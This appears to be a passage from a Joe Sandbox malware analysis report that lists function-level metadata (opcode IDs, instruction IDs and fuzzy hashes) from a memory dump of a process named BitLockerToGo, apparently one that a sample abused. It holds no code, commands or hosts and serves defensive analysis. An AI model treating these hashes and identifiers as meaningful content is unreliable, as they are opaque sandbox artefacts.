                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f6058685706a4b9884b74908391a19c10f0b4d6fdd3ae6168e92701922a9f3f
                                                                                    • Instruction ID: 5ceb4989b1b86f645277271506dccbfdfc38913f66a9b4bce4754ff2b505bc7e
                                                                                    • Opcode Fuzzy Hash: 2f6058685706a4b9884b74908391a19c10f0b4d6fdd3ae6168e92701922a9f3f
                                                                                    • Instruction Fuzzy Hash: 6B52D270A08B849FE730DB24C4843A7BBE1AB91314F15893ED5E7267C2C37DA995C71A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e462e2d2b4d664232bddda86f707e6d7dfd7b7d18630e8fe4ab93a725646434
                                                                                    • Instruction ID: 1fdbdd34fcc77c32b79dab7dd7279ebfb464f3e9845fc9dd6af1f60592f44fed
                                                                                    • Opcode Fuzzy Hash: 3e462e2d2b4d664232bddda86f707e6d7dfd7b7d18630e8fe4ab93a725646434
                                                                                    • Instruction Fuzzy Hash: 4D52F5715083458FCB15CF28C0906AABFE1BF89315F18867EF89967381D778E949CB89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7431acdf2bb0df9f5d64ac42b9b2a79ca823d03e3cbbd7ec7a0b21da91d18a0
                                                                                    • Instruction ID: 16be905699757f58d08162ad6942cc9dbbe75419bc267803a287b0f1a35843ed
                                                                                    • Opcode Fuzzy Hash: d7431acdf2bb0df9f5d64ac42b9b2a79ca823d03e3cbbd7ec7a0b21da91d18a0
                                                                                    • Instruction Fuzzy Hash: BC12B472A087118BC725DF18D8806ABB3E1BFC4315F19893ED9C6A7385D738B8558B87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ddb25166d6e40877f6ccc7991eb95f166459aab1e500651e052a739ec97d630
                                                                                    • Instruction ID: fcbb075d82800fa21d99395b30d46dcba7733093782d6adb3d4b01ac132fc4ef
                                                                                    • Opcode Fuzzy Hash: 1ddb25166d6e40877f6ccc7991eb95f166459aab1e500651e052a739ec97d630
                                                                                    • Instruction Fuzzy Hash: 94322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c20ee7d1fd3c2e695e38734b33f15da7c2f123df62230dcde53f4cf05a35178
                                                                                    • Instruction ID: b3da4d7c7a96eb8050c9bb065d93e430765124b9399a5d3bdf25a4dde5708ecb
                                                                                    • Opcode Fuzzy Hash: 5c20ee7d1fd3c2e695e38734b33f15da7c2f123df62230dcde53f4cf05a35178
                                                                                    • Instruction Fuzzy Hash: 96426CB0209B818ED335CB3C8815797BFE56B5A324F488A9DE0FA873D2C7756005CB66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                    • Instruction ID: 02d2229be3a83fbc5474e3e6ea086dcca113fe43498424369727b2d08b453b9d
                                                                                    • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                    • Instruction Fuzzy Hash: 30F1BE756087418FD724CF29C88076BBBE2EFD9304F08882DE5D997391E639E944CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 47bdd86f9149c78e8931a02de7ed9d56138aef0559dfde390388fb0a4284f46e
                                                                                    • Instruction ID: 2d32b6a3528814d4c24523c73119158def0aab2ae49429046858fb794448a504
                                                                                    • Opcode Fuzzy Hash: 47bdd86f9149c78e8931a02de7ed9d56138aef0559dfde390388fb0a4284f46e
                                                                                    • Instruction Fuzzy Hash: 03B12675904300BFDB109F24DC81B5ABBE2FFD4358F148A2EF498932A1E7369D568B46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2b4fb4a0d1b697f84d3669f7b0098d7e02f4f4742a568c657743ca0c137fdaee
                                                                                    • Instruction ID: 74d931ab855a48af746ba0e3dc3892a10fca20c4ecf4284ffac6787a2b03bbec
                                                                                    • Opcode Fuzzy Hash: 2b4fb4a0d1b697f84d3669f7b0098d7e02f4f4742a568c657743ca0c137fdaee
                                                                                    • Instruction Fuzzy Hash: 229103356083519BC728DF28D8D1A2BB3E2FF8C300F15A92DE986AB355DB75AC41C785
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5605cae5b1bda8ad3a4cf5cb71b2aea22018d0d7e53cffc64163186733435116
                                                                                    • Instruction ID: eb4bfc3efdb46786f2e6bebf935458a3fcec0c4f1143b4373b6fc09339c11b48
                                                                                    • Opcode Fuzzy Hash: 5605cae5b1bda8ad3a4cf5cb71b2aea22018d0d7e53cffc64163186733435116
                                                                                    • Instruction Fuzzy Hash: B0C15D729487418FC360CF28DC867ABB7E1BF85318F09492DD1DAD6342D778A155CB46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8f08d3bf843c8cc81cd410b94f476b274efa18dc9aab804fa5c474ce87c232ad
                                                                                    • Instruction ID: c07933878babe71f3ccc4ba8684601a0ec1b95e7ac8a20c0172c4066b999b2d0
                                                                                    • Opcode Fuzzy Hash: 8f08d3bf843c8cc81cd410b94f476b274efa18dc9aab804fa5c474ce87c232ad
                                                                                    • Instruction Fuzzy Hash: 8681E1352083029BD724DF28C891A2BB3E2FFC9710F15A52DE9859B351EB34EC51CB89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d51b7f19852cb98f9319ef847b503ad5ee0d04e85e6670b6974c824828583a6e
                                                                                    • Instruction ID: 21f4277e489b25c4b6297c542707cfb0cb85732d2b39f996b935debf0f516e07
                                                                                    • Opcode Fuzzy Hash: d51b7f19852cb98f9319ef847b503ad5ee0d04e85e6670b6974c824828583a6e
                                                                                    • Instruction Fuzzy Hash: D9B14F31A087918FC715CA7CC8457EE7FA29B9B220F1D839DD4A69B3D2C529A807C761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee99c97f6f89cf30c3feef9581b9004457b133a689d45e6388639d76d7a6940e
                                                                                    • Instruction ID: 14eed3b193b92f7bd7c91c1a12cb5a7423ebfd5753331b59b2878284fe61ec2b
                                                                                    • Opcode Fuzzy Hash: ee99c97f6f89cf30c3feef9581b9004457b133a689d45e6388639d76d7a6940e
                                                                                    • Instruction Fuzzy Hash: F971053124C3C28AD3119F7984903ABFFE0AFA2304F08597DE4D49B386D7798919D766
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18dc34ae9a606a1da8fb6243ebac13852137b570fb580b94def7ef54e059c2e7
                                                                                    • Instruction ID: 321a41b0e24768df93993f45ec39ff26ec6abcd782719345d1c535d6020f9ee2
                                                                                    • Opcode Fuzzy Hash: 18dc34ae9a606a1da8fb6243ebac13852137b570fb580b94def7ef54e059c2e7
                                                                                    • Instruction Fuzzy Hash: FE715622B59AF14BC318593D5C212AABA834FD6334FADC37EA9F18B3E1D5598C068345
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59191fe466e87ea392e17c001d7f114284416eb859047ee4e189d9d42fcda35
                                                                                    • Instruction ID: 7a38c4d14191e423d518bcd012fcfe6135c3ceb1f89b606c91b16954ab462f1c
                                                                                    • Opcode Fuzzy Hash: a59191fe466e87ea392e17c001d7f114284416eb859047ee4e189d9d42fcda35
                                                                                    • Instruction Fuzzy Hash: 46712933B599A14B932C893C5C62266B9934BD72347AEC37FE5B1C73F5D96C480A8348
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 300e2a16f2aa471d5cf9c35f9543d1f41723d5b77572bb696f02dc22411e4e29
                                                                                    • Instruction ID: fafc8b41128148528121a67710092d43837a77869dcd5a4b7325ff8bb9b2a2ab
                                                                                    • Opcode Fuzzy Hash: 300e2a16f2aa471d5cf9c35f9543d1f41723d5b77572bb696f02dc22411e4e29
                                                                                    • Instruction Fuzzy Hash: 22610A73F4958047E328893C4C512AABA934FD2234F2DC7BEE9F5873E5C56988458346
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a2354b7e78736bff6752e317a600d56ae2db8798d09994f5bf9b8b57d6477927
                                                                                    • Instruction ID: 14fdeba948a93b3c53f68ce45ab72a6c3727f090b9ad8d9c7f5e46addf120586
                                                                                    • Opcode Fuzzy Hash: a2354b7e78736bff6752e317a600d56ae2db8798d09994f5bf9b8b57d6477927
                                                                                    • Instruction Fuzzy Hash: D551BC7420C3118BC714DF24D86266BB7F1EF82724F44991DE4D59B3A1E338D905DB5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c4fdf97a2f1a179d9e674d41816b876a5a1ec115cd740e6f1111616f76577ff
                                                                                    • Instruction ID: 790f180e8d4a6f5c1ef5855a9cf66029b52f87d90570feadd83e32b30a7b9a35
                                                                                    • Opcode Fuzzy Hash: 1c4fdf97a2f1a179d9e674d41816b876a5a1ec115cd740e6f1111616f76577ff
                                                                                    • Instruction Fuzzy Hash: 8471C77160C3428FD715CF28C49062EBBE2AFC9314F188AAEE8D58B392D675DC41CB56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d4fed3f0ba83135604789746c5e92f042240db01558bdd2702fb766c9ccdb92
                                                                                    • Instruction ID: 804195c8b1f9a977300dfb6ed4e56dd22b4087539773d87b635c909f9b7ebc4a
                                                                                    • Opcode Fuzzy Hash: 7d4fed3f0ba83135604789746c5e92f042240db01558bdd2702fb766c9ccdb92
                                                                                    • Instruction Fuzzy Hash: 2F51E473F159808BD7188D3D8C112EA6A531BE7334B3E837B99B58B3E5C62A8C468355
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cc8c0ecc0da0eced31d3500927d73d3a40b888f2ec8c29f7fef54cba9e22d4b6
                                                                                    • Instruction ID: cb991a55680070318c7d0b3c79711b513c51a95225e1ecc1281be0889af13ba2
                                                                                    • Opcode Fuzzy Hash: cc8c0ecc0da0eced31d3500927d73d3a40b888f2ec8c29f7fef54cba9e22d4b6
                                                                                    • Instruction Fuzzy Hash: 07513833A6A9814BE328893C4C502EA7A930BD3330F3DC77AD5B4873E4D5698C97435A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 74f69f23d04b8d3363161613e04029a9dd53a912bd554f0e8a5a3837446c2789
                                                                                    • Instruction ID: 926b0f658338236115fec19bad7f90239f3caae2bc3b57b709916a7c7eb54a4e
                                                                                    • Opcode Fuzzy Hash: 74f69f23d04b8d3363161613e04029a9dd53a912bd554f0e8a5a3837446c2789
                                                                                    • Instruction Fuzzy Hash: 4961E0B1A413669FDB44CF68DC82A9ABF30FB06310B1542A9E450AF352C734C442CFD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e168b79f61548e1623c39d89a8750a3322975b5e6821bc4d28b4c5b4afa9f4b
                                                                                    • Instruction ID: 4b721b9351200411affedd0fe1460c26ece020c84106155a22f403e348d89d81
                                                                                    • Opcode Fuzzy Hash: 1e168b79f61548e1623c39d89a8750a3322975b5e6821bc4d28b4c5b4afa9f4b
                                                                                    • Instruction Fuzzy Hash: 05517DB15087548FE314DF69D49435BBBE1BBC8318F044A2EE4E987350E379DA088F86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b3c75c708d9c2eb232c2878fcfd7121cd9994fe1ff6eac5a4affbb7310c2ad84
                                                                                    • Instruction ID: 3219bdbc90bf553ba409493bccfc3ce243fda83e1ac63137579968e9d462d64e
                                                                                    • Opcode Fuzzy Hash: b3c75c708d9c2eb232c2878fcfd7121cd9994fe1ff6eac5a4affbb7310c2ad84
                                                                                    • Instruction Fuzzy Hash: 04512773E187350BC714CE289C9021AB2D2ABC4214F5B867DDDA99B386EA34EC05C7C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f6a177ef1093b82863d6bdf4325194f686afbf03b595ab962e2a594d60901889
                                                                                    • Instruction ID: ffa4024d1fecf6a95fbfc38947bfe75a971755c75a06410646f70d773baaa8df
                                                                                    • Opcode Fuzzy Hash: f6a177ef1093b82863d6bdf4325194f686afbf03b595ab962e2a594d60901889
                                                                                    • Instruction Fuzzy Hash: 0F41E1B560C3048FC714EF65E84157BB7E2FBD9304F14957EE19683661DB3898428B8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                                    • Instruction ID: 9a6b9e8a26fb0f3bc84429a8fb07d45c664269e9ebb10f82827b0a9ce94155c9
                                                                                    • Opcode Fuzzy Hash: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                                    • Instruction Fuzzy Hash: C1410B32B0827147CB188E2D8D9417ABAD75FC5205F0EC63AFCC5AB7D6D578990097D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5603cbb745550a2514ff01182270a9a8e80b3420d347e984a97f53bf9fbb18c
                                                                                    • Instruction ID: 4d9938d5427aa00a19422e960cfa433b480ec0df9e382fbeb79cb8a426852a4d
                                                                                    • Opcode Fuzzy Hash: f5603cbb745550a2514ff01182270a9a8e80b3420d347e984a97f53bf9fbb18c
                                                                                    • Instruction Fuzzy Hash: 9131F271A09750CBD7208F14C8952EBB7A6FFC2314F088A1ED0D99B3A4E7388441CB56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 63772adff518944676ac6470e3648175ca610b2eefb1d204d6592b914da60d35
                                                                                    • Instruction ID: 2c40c0230266d8b2cfbe3e46dea91ec0ef3861f69abc0ad3f180c9264077abf0
                                                                                    • Opcode Fuzzy Hash: 63772adff518944676ac6470e3648175ca610b2eefb1d204d6592b914da60d35
                                                                                    • Instruction Fuzzy Hash: 4731D4B56083088FD314EF64E84167B77E2FBDA305F18947DE18593321E778D842968A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9433e60035ba4c9306ed9e0aa2f5c2921af3a1801f73c3913cadd04d8984d3d7
                                                                                    • Instruction ID: 0cb7e63ae8744aacaefeca5f920cf5fe8da4bed82846817093fb181a9d0cc02d
                                                                                    • Opcode Fuzzy Hash: 9433e60035ba4c9306ed9e0aa2f5c2921af3a1801f73c3913cadd04d8984d3d7
                                                                                    • Instruction Fuzzy Hash: 8B412AB2A0C3908BC728CF25881279FBAE2FBC2304F499E6DD4D59B351D73885068B47
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0f6ad7d9c34e7ea356eb3540795efbc1ab240de763d2a8bf3d96e86f7d4d8a92
                                                                                    • Instruction ID: 81e569abe051f961958ec96375d0cfb2aa78fc3b7caf3bd46b5982c106ba7b36
                                                                                    • Opcode Fuzzy Hash: 0f6ad7d9c34e7ea356eb3540795efbc1ab240de763d2a8bf3d96e86f7d4d8a92
                                                                                    • Instruction Fuzzy Hash: F62129246086450BC318DE3844A1237B6D6DF9E310F19592ED696DB691EB2CD90187C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2ae1ecbdd5ccb704cb593e8af954e716b6d7fc6c9e0ea1c3bdec56e73eb41192
                                                                                    • Instruction ID: fca41f22eda54ae0133c663ea8b877ba853581e50aeda0c197d52a580c5e259f
                                                                                    • Opcode Fuzzy Hash: 2ae1ecbdd5ccb704cb593e8af954e716b6d7fc6c9e0ea1c3bdec56e73eb41192
                                                                                    • Instruction Fuzzy Hash: 00218F3860831B8BCB24DF68C49067EB3F2FF88B84F56D46ED88057224EB389D659715
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8aec68d1cb419c89565ea5824c88c8953c25aeeb2aa4d373872804785ba67db2
                                                                                    • Instruction ID: 30c4168b9de1aa88309de4f0fa0d616f59544a5b9bd3e046015339af948f82e3
                                                                                    • Opcode Fuzzy Hash: 8aec68d1cb419c89565ea5824c88c8953c25aeeb2aa4d373872804785ba67db2
                                                                                    • Instruction Fuzzy Hash: 3B21A1379A2B284BD3108EA4DCC57913295E795328F3D86B98934AB3D2D97F9D0346D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6fa11c3f533b8eba760b25f0fb583a2543553b87029177c7212ae4619e256edf
                                                                                    • Instruction ID: 319dea69129caf743b3be47d61f7b803c4b4f15ce93bdd553d01b9543d361ed5
                                                                                    • Opcode Fuzzy Hash: 6fa11c3f533b8eba760b25f0fb583a2543553b87029177c7212ae4619e256edf
                                                                                    • Instruction Fuzzy Hash: F4112934691A008FD769CB34DCA0AA737D3E79B310708D43CC082DB319D639D8139654
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b47b3b87f24bf36e1815b4704a109b377dfb0146f8b33a2d13de1756e8a05215
                                                                                    • Instruction ID: 0df1de46acb0cf65b8b5c8fb05c5283745532909b01a0f1a82a34596878673d8
                                                                                    • Opcode Fuzzy Hash: b47b3b87f24bf36e1815b4704a109b377dfb0146f8b33a2d13de1756e8a05215
                                                                                    • Instruction Fuzzy Hash: 7511C437B2962207E350DE66DCDC61B6352EBC531071A0535EE45E73C2C6B5FC02D1A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05138cbabdc80a3af10c228aea33de1959a9dce9bf2d62049151e53430b4be4c
                                                                                    • Instruction ID: 2c22502caa2999549552e45288962016bce12bbc1d9e56d541357ed696b52ddd
                                                                                    • Opcode Fuzzy Hash: 05138cbabdc80a3af10c228aea33de1959a9dce9bf2d62049151e53430b4be4c
                                                                                    • Instruction Fuzzy Hash: 671101B560C3049BC304EF24E84196BB7E2FBDA305F14983DE68587321E734EC829A4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                    • Instruction ID: e33911fe9070215d35ca5e51225649dc2275d76c858c1e42cbf454372d559ea6
